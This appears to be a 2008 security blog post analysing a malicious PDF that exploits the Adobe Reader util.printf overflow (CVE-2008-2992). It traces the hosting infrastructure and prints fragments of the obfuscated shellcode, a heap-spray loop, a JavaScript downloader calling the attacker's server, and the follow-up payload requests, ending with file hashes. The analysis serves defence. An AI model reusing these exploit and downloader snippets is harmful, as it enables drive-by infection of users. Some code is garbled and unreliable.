Wednesday, November 12, 2008

CVE-2008-2992 Adobe PDF Exploitation

On 7 November 2008, SANS reported an active exploit against the Adobe Reader and Acrobat util.printf() JavaScript function stack buffer overflow vulnerability (CVE-2008-2992). Adobe Reader and Acrobat contain a stack buffer overflow in the util.printf() JavaScript function, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. The vulnerability was first reported by CORE Security technologies in May 2008. Adobe released Adobe Reader and Adobe Acrobat 8.1.3 on 4 November 2008 to address the vulnerability (APSB08-19). Public exploit code was reported on 7 November 2008. The following analyzes a malicious PDF sample.

Exploit Analysis:

The site hosted the malicious PDF file data.pdf (hxxp:// The domain is controlled by five name servers at Dynamic DNS (DDNS) allows individuals to create a hostname that points to his/her dynamic IP or static IP address or URL. DynDNS also provides an update mechanism which makes the hostname work with a dynamic IP address.

At the time of exploit, resolved to located in the Netherlands.

inetnum: -
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
remarks: Please send email to mailto:"" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
mnt-by: OCOM-MNT
source: RIPE # Filtered

The IP currently maps to 19 domains.



The malicious PDF file includes objects that contain document-level JavaScript.

00000581 00000581 0 24 0 obj
0000058A 0000058A 0 <</JavaScript 25 0 R>>
000005A1 000005A1 0 endobj
000005A8 000005A8 0 25 0 obj
000005B1 000005B1 0 <</Names[(main)26 0 R]>>
000005CA 000005CA 0 endobj
000005D1 000005D1 0 26 0 obj
000005DA 000005DA 0 <</S/JavaScript/JS 27 0 R>>
000005F6 000005F6 0 endobj
000005FD 000005FD 0 27 0 obj
00000606 00000606 0 <</Length 1257/Filter[/FlateDecode]>>stream
00000636 00000636 0 W[k+7
00000667 00000667 0 Ms(l6
00000799 00000799 0 Gs~tx
0000086E 0000086E 0 8U7n
0000091B 0000091B 0 l+Vi5
0000096B 0000096B 0 o :[hx
00000B1E 00000B1E 0 endstream
00000B28 00000B28 0 endobj
00000B2F 00000B2F 0 28 0 obj

The inflated PDF FlateDecode streams reveal obfuscated JavaScript which further decodes to reveal shellcode.

var sccs = unescape(""+"%"+"u03eb%u"+"eb59%ue805%uf"+"ff8%uffff%u4949%u4949%u494"+"9%u4937

var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < fblk =" bgbl.substring(0,slspc);" blk =" bgbl.substring(0,bgbl.length" blk =" blk" mmy =" new" i =" 0;" nm =" 12;" i =" 0;" nm =" nm" i =" 0;" nm =" nm">

The shellcode execution results in a GET request for hxxp:// The domain is hosted at (same IP as

The request returns obfuscated JavaScript. The image reference for hxxp:// is for tracking purposes.

The decoded script reveals a redirect to

var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){} }

if(xobj) {"GET", "/code/srun.php?req", false);
xobj.setRequestHeader("Request", "srun");
response = xobj.responseText;

if(response.length) {
dec(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";

The request returns content for additional binary downloads.

GET /code/srun.php?req HTTP/1.1
request: srun

Six minutes later, a GET request for occurred. Additional hex-encoded binaries were downloaded over an 8 minute period. Notice the user-agent (WinHttp.WinHttpRequest.5) and Request value: srun.

GET /get.php?src=xpre HTTP/1.1
Request: srun
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32;WinHttp.WinHttpRequest.5)


The following is an additional request that lacked the WinHttp.WinHttpRequest.5 user-agent.

GET /code/const.php HTTP/1.1

The downloaded malware installs a variety of crapware (rogue security products, adware, etc.)

Filename MD5 Size (Bytes)
data.pdf 84bc91579cd4dbee7faf3ee09c4a9a4b 10179
prun.exe d7512e025c439d8454a742992229770c 34816
rasesnet.exe 423d4daf5374710d4498ed917f44b92a 135168
searsnet.exe 18bd892d291f21f14e660537112bb81c 65024
snapsnet.exe 637146739c0dc4c078e0654e6d77eda1 112378
wavvsnet.exe 602b54e018fe9b226ebf8fd5ebaff09c 40014
winvsnet.exe 279ce5af3638a2ba1fde073bbe73a0c5 54784
xpre.exe 1d032fbc6d6884903fa92889f99fc180 745472

No comments: